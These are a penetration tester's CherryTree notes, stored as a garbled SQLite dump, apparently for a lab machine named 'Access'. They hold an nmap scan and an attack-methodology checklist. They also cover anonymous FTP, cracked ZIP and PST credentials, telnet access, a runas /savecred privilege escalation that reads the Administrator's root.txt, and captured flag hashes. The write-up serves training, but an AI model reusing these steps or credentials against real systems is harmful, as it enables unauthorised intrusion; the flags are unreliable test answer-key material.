SQLite format 3@ -  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.x.x.xcustom-colors$A[Y)A[Y}xnLC'  TCP# Nmap 7.70 scan initiated Sun Oct 21 10:32:3v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lm'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=uk' 10.x.x.xcustom-colorsA"A oo$Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2i '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad kv)'  Script Resultscustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnn'%w'  ExploitationService Exploited: V<!'   OtherFTP OPEN ANONYMOUS get 'Access Control.zip' wget --no-passive-ftp https://www.mdbopener.com/ Convert backup.mdb to CSV auth_user table has Engineer:access4u@security Use this on Access Control.zip for PST. Telnet using password inside the PSTcustom-colorsA[EϯAמ|j UUkk(%y'  ExploitationService Exploited: FTP and Telnet Vulnerability Type: Misconfiguration Exploit POC: Description: FTP Anonymous Allowed and Telnet credentails sent in plaintext via email stored in PST Discovery of Vulnerability FTP - NMAP Telnet credentials - Backup.mdb >auth_table > unzip Access Control.zip to retrieve PST > Telnet credentials inside PST Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,Aמ+33 OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg O^Og'  Goodiescustom-colorsVA?& c+i'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used Proof\Loca +='   Priv EscalationService Exploited: Stored Credential <runas> Vulnerab)c'  Scheduled JobsScheduled Taskscustom-colors$ANl XXoOM'  PasswordsEngineer:access4u@security - Initial ZIP password Inside PST: Hi there, The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers. Regards, Johncustom-colors$Aמd( /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{x/'  PrG/-'  Proof\Flags\OtherUser-security-ff1f3b48913b213a31ff6756d2553d38 Root - 6e1586cc7ab230a8d297e8f933d904cfcustom-colors$Aמ& f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r ☐ smbtree custom-colorsAמ ?|h  ' Log Bookcustom-colors(AI^ 88#/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File Systemcustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnnZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4*ility Type: Misconfiguration Exploit POC: Description: Administrator credential stored on system Discovery of Vulnerability cmdkey /list C:\Users\security\Desktop>cmdkey /list Currently stored credentials: Target: Domain:interactive=ACCESS\Administrator Type: Domain Password User: ACCESS\Administrator Exploit Code Used runas /savecred /user:ACCESS\Administrator "cmd /c type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Documents\null.txt" Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAמM 55/]'  Running ProcessesProcess Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3Q8 2018 as: nmap -sC -sV -oA ./accessinit Nmap scan report for Host is up (0.059s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 425 Cannot open data connection. | ftp-syst: |_ SYST: Windows_NT 23/tcp open telnet? 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: MegaCorp Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Oct 21 10:36:00 2018 -- 1 IP address (1 host up) scanned in 202.08 seconds FTP is key See Other Services > Other for progressioncustom-colors$A?&AמZE